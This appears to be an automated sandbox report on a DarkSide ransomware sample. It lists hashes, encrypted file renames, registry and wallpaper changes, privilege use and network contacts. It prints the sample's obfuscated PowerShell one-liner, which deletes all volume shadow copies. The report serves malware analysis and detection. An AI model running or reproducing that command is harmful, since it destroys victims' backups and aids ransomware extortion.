MD5 c4a85e28db8384c144974acbf425787a
SHA1 c9e5832f263da2f28827e6db70383e976393952d
SHA256 0efd753008c76eb6ba7206b014cfeb2cc5dc2ea7d134fcd7045ab59f03a34151
SHA512 1a1324ff492b1808573ad0a2c4663aae461dcaefe71e80a2d190c19317701a2f3a611493d4342a50ce1e42c37e48a44465eb18294e753d32fac30df2141bce3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003

MD5 a2a02d1cc5362a1ea22cdd844384b707
SHA1 53eb1b1402f6590a05b0049b34a5afe2eb5aae11
SHA256 32bf1d779592481ca405b57529b1e5ae5ea2c3ff427d4a54238ca489b6005b72
SHA512 96ab950c3555f1c837572d9082315c40f0281a4e54a7a478073ba7142de6e0dd58477c08ece3b1b56fa2ad39482e3dac8f7bce72e1a0a93b05eec86e5356dfda

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002

MD5 8e6367806dd66a70cb1dccfbfa959d93
SHA1 74757af565f685d7ce813bb0601b0e0c69465a7b
SHA256 97dcb049ad634d583b9f3a5bf8a9528b5e9b73ec00fe3dde65e544a7c5885249
SHA512 7024562ae7d105bc54cacec51ccc1fb7f54e300ad9290e4114084ccec8d6978b986f7d66acb95614154bd1fa314372c25df4bf2fb29048f2f9aaaa1610a6eb68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002

MD5 22bf0e81636b1b45051b138f48b3d148
SHA1 56755d203579ab356e5620ce7e85519ad69d614a
SHA256 e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512 a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db

MD5 9a8e0fb6cf4941534771c38bb54a76be
SHA1 92d45ac2cc921f6733e68b454dc171426ec43c1c
SHA256 9ee9211a57c3f6fa211fe0323fa8cd521e7cbffcd8ff0896645a45795dc472be
SHA512 12ed22537dcc79d53f6c7d39e92a38f8fea076d793198928f5b7a5dd1234d50a3c0b4815632f3fadf8bc4ef0499773d22bd83f961d2d0ffd8afacf471bd3a5ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

MD5 9da04288eaee7f27f19509adab997810
SHA1 f6ecd2dacd5283e436d91dc2f5114b110a7b2e1e
SHA256 30684ee7baee4e2c22de3c5d62c8469606ad9088269ca96d6d44ee056ea6d5bd
SHA512 7e64b31db28c7caf18e4fb9f0d8698851936584fb78db02a92199faeee36120eb43570f16b7912a2de2749456d4cbeaedc3680fdaeeaa09e5d1bc7b15e11b0fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal

MD5 7cb0dccfef4d130ce7d47a749d054dc4
SHA1 4f664de80dc5f4f65fc286bdc75964e11bbefe49
SHA256 804b0dc09f381e21f0441925fd6987944d77ac78e8a922649b4cd2f71ff58355
SHA512 b037427a5decb092db2d3f8b55d67e9c751d48dba822d729a2ebf0b7bb2a8a76c60b6093a4399b7e9452baa2c38031671e445075f384832044d2e8cfcb1d8d90

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 0eb80653c1f50a5416b4c34a66dd7287
SHA1 324f78cb5e36f3fe83dd751380552e9b1aabc2cd
SHA256 4371a3b88885f0377c44f86aefaef639952394823d574838d72cdf4845e1014d
SHA512 24fd378028da51b2eb6dc9fc5f925916d5e0fc2bee45ca2488bc1c76b9617836bc4bb1df0fa7c411e5c086ee9ce935c94a9448b3fc6474d5cd7afafe574f4aa2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 4e6b9fb40c519dfb5ad09840080776e3
SHA1 db5a428cfda4864128678ac31fa64d19267807ce
SHA256 07a83533cb26ce9d769df0c669b7a13ca1fec4fdbbc4f144a883f6e5f250db16
SHA512 7b837a25c34e476655697ca20e474cbaa86847035234eee5f38074cea74763d08d8bdb603984e1857537cae51149e4203db6911fa35819db623852aebc5fbaa7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 fa1af62bdaf3c63591454d2631d5dd6d
SHA1 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466
SHA256 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d
SHA512 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 773f2fcd5b74a35cbb85ef5f308e5e58
SHA1 20f82e79668c02efc12b21bbb2a1a7bf7c74b8e3
SHA256 cb47593c0dbf43149dd468e07547d96ef4a72862010906f41a86aa4b985270b1
SHA512 4a8800076ed00ef2f172355cab1f90efd86bbbc9e2f1cd402940b2066ca5e7cec6acf2da60c38baa7bf039da3b0bb29a01553838d3e142cc34dfb66578c2642b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 824b0ec1a4aef15d2a357de90b404fcd
SHA1 906ad4d42f6cd892da7ffc75d01fb1abc276ac81
SHA256 ffa87a57d8bde50cd0842877894e10f9777a766f925c36297cd4102fee31b98d
SHA512 24e88cfccdba8e55c21980e0b614e11d33e87bb5841ec6ae35fb64227a15a6dfcad3f4b14c38ec8584f01d280449160937f617ca1d8cdbbaf45a079394b0d9de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG

MD5 15554c3069a5ab63eca4b4bee420ad11
SHA1 6ecdff4345fbd251ccf91889486d0426057627c5
SHA256 e70e839b4cf998dfa2cd62474c1aca82f998dcc23e6f312189236ddc8fe4983d
SHA512 25de143dceb4659baf36ab14386427299dc67757298f4f6312a41d080b1d43aae58ab10fa98e2978c2078131171cb87a996c68d85cb81db02f4e9e76cf4650ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13287626619086400

MD5 840af2bf59083860db33f884c66b040c
SHA1 56658a8465bb0aaef3bbc325c09cd1b69048a904
SHA256 c14a2f41ee01779df91c239e87f7fc6f952d4f69ddac2fa93b9a6337955ae7b9
SHA512 af76c5cc19ccb1044e5f88b30683b3f3098b85212a3d4fb2180c4972e8853068e104339e5c746a83dc03ae4aba9b96419bb8fe9858914be953995b3f362ac8e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13287626619848400

MD5 269b0fce0cd8b92a09b92441e3d5d812
SHA1 685431016488755bda152b15254d3e555b4b1a15
SHA256 d1261f7ccad90515107d41df5c9b23b409b6cb210f759aa9d06963df0710a16f
SHA512 7262815888283f7d60617d34daae233ad33335a0128d57dde5beb24d443910922f0b53aaf64d46a58e52ce4121c846e9016cd02c444745636e7c4b3276bf9868

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

MD5 e157d534c7693880ab1a318166f68c44
SHA1 3791ed384bbe52c2624438bab37af422179bea66
SHA256 71725cc6fa90a65ac8a2e3b45c5d03aa4e279e02eb4c49a1b6f3ce33d5b78c4d
SHA512 e54efa23fafbeaf6ec75e0a598c4a68663693dc9108fea72316afab9d783d3735f08d075f2b253f4620acaa2c8b86921bbceac1cbe35c2e2b550cb4722e4ac72

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

MD5 0d9f70652007603a81c7847dc3cee8da
SHA1 4a7c8341cfd657f31314690bfd9bd8f51030c5b5
SHA256 a705d9d26ed11df2f38e6c25557ccb83916b8598fe92d2ad25868f9ae89844f7
SHA512 27e34f4b5077a9bb58f30d2447c43d2ae877495bda975b33f405d5d08d03a009bf67bd24abcf70838934f17f1ec66ed1b98429ad96997cae68d0f1e0bf9ea4cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity

MD5 2cf5c8c911eee4269a7cfc06889d9e9d
SHA1 fa6ef6012ea7f3ddd683b68cd82d83dc73460031
SHA256 086507bf5db9cd193fbe59605a1f13ddc880d33c3efa340bfa3bebfe11e27353
SHA512 c834b563e3f5c6fc0ddd11d73b87fd4eaf16b838754bdace4094fa1f293714049b29f90bb42e79d643bd28cf79108443de0b1625501a64534262d67cf899c197

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

MD5 66950e3c3e5f6035163261a735b9fae0
SHA1 b9018ce6ba3bf763974ecc8866e28be1f0c3c244
SHA256 00dfed089890350ecc2ac2b06db31d403bfff4c6d347d871499b4610fc134979
SHA512 fc11b7dcdc51545d62d87b205a801b17fae3fb427134ea8906723c637ff393ddd2ab0919e06fdb02bc74703c4aa4c51029aa4119cc721ace00085652b2194f13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 b63048c4e7e52c52053d25da30d9c5ab
SHA1 679a44d402f5ec24605719e06459f5a707989187
SHA256 389caa40ea458e84bc624a9af1e0dec60fa652b2db2b81c09b1dfe22822cc3d1
SHA512 e86c58c5a25e24f21ad79ed526a90c120a09c115f4820663bd2ebbc59e7bb1c4c418267eb77645522aa20b2c1b53fba8e31690db7bae9b21e4eff3db06316359

C:\Users\Admin\AppData\Local\Temp\075365ae-37de-4c56-b42e-4fed804cdf67.tmp

MD5 19c0d737d50feec0112fb4a48329ff04
SHA1 8d58269c40e217e4ebe82fadc27110e7930cfebe
SHA256 f519a32686ace222a22aea7c302d5bf351d0134dfbdc906582e0a4669901cfac
SHA512 02de852ba2340aab4a978be9332e26035b00e05e5638f58deaed0fe0f39944fa01781d22ba3a692505c87c3a1d212e29fac0e6995e7e2edb5421fe5d069922a3

C:\Users\Admin\AppData\Local\Temp\2bd9593e-631d-4f41-b9e1-62ae67fc52ca.tmp

MD5 2751ccef058d0cae0f78664bf150000e
SHA1 5fa719bbbf9fca57bd41eedd342710201ae6d160
SHA256 1c8f3555eeb92dbde479755ced7ccbf3337fa93358e0d32890813bcdd43b65f3
SHA512 7974566578614606816c6022d7817e4bca95c336accdd1f5985b13673c15190887eea0ad76b4d8987637fa9c2b2bdeeac6f9c921e1ee26924ad323e6a99d12fb

C:\Users\Admin\AppData\Local\Temp\1448c634-9788-4297-8cfe-538428696765.tmp

MD5 541f52e24fe1ef9f8e12377a6ccae0c0
SHA1 189898bb2dcae7d5a6057bc2d98b8b450afaebb6
SHA256 81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82
SHA512 d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88

C:\Users\Admin\AppData\Local\Temp\d3cb9278-7b02-4be2-b492-56cc5b0c64df.tmp

MD5 f1140ebc420176d428c7e6cfac726733
SHA1 9f0ee1215624c03964974d366ef0813849dd5ca0
SHA256 f388e99f7df063dcbad923c85976b36d7e9c267750653c95ac7c13b2b122371c
SHA512 ee6bde45b1f14bd1994139b82fcaae5bd6ef80bf24f080cfc503adfaf400d7714270ac1974f41df6f3e8b8abe2b93b19d4a0edef8dd3a10517d896b7f60e761c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1c50c2115d4fbdf82136c7743b327842
SHA1 9bc645a9588e40b8ec41b17a15ca5771a4446f82
SHA256 e4885ffdef1fb72e2808cb1cf4f3719a6ab98528bc869a415da3dcd7bf7f2c4c
SHA512 d5de7c24f1099a81297a699218c73cd1d5cdc50d436f6cede4505c9bff2cf881143a945ec389d34564b11e9fc59430ef841358d1c37f79bb7ff9872918d37847

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-25 23:22

Reported

2022-01-25 23:29

Platform

win10-en-20211208

Max time kernel

121s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\LimitGrant.crw => C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseCompare.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\UseCompare.png => C:\Users\Admin\Pictures\UseCompare.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\AssertRedo.raw => C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\BlockMount.tiff => C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\ExitResume.raw => C:\Users\Admin\Pictures\ExitResume.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\ConvertFromInvoke.png => C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertFromInvoke.png.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\LimitGrant.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterSwitch.crw => C:\Users\Admin\Pictures\RegisterSwitch.crw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\AssertRedo.raw.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockMount.tiff.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\82ee2099.BMP" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.82ee2099\ = "82ee2099" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\82ee2099\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\82ee2099.ico" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2812 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2812 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\mal.exe

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 catsdegree.com udp
US 72.52.178.23:443 catsdegree.com tcp
NL 67.26.111.254:80 tcp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp

Files

memory/2812-115-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2812-117-0x0000000000030000-0x0000000000040000-memory.dmp

memory/2812-118-0x0000000000400000-0x000000000083B000-memory.dmp

memory/3732-123-0x0000026698470000-0x0000026698492000-memory.dmp

memory/3732-127-0x0000026698460000-0x0000026698462000-memory.dmp

memory/3732-128-0x0000026698463000-0x0000026698465000-memory.dmp

memory/3732-129-0x0000026698750000-0x00000266987C6000-memory.dmp

memory/3732-141-0x0000026698466000-0x0000026698468000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5dc1c5e5f49d8a67a608b1f715ace841
SHA1 812f23c3fce094196e514f140702f69ba13aab1f
SHA256 d4df86e848e8eece19d9ec956704e488fe47de1df1a9d74dc2eba39ffdb39214
SHA512 ec232e6585f4c420076b634f8683dc0de1eaa29847efc398697f47313b1523d0f311d5dd35bb27e79e10ac807ccb5bdff220a66c35aaae82f3e4b13e517a5273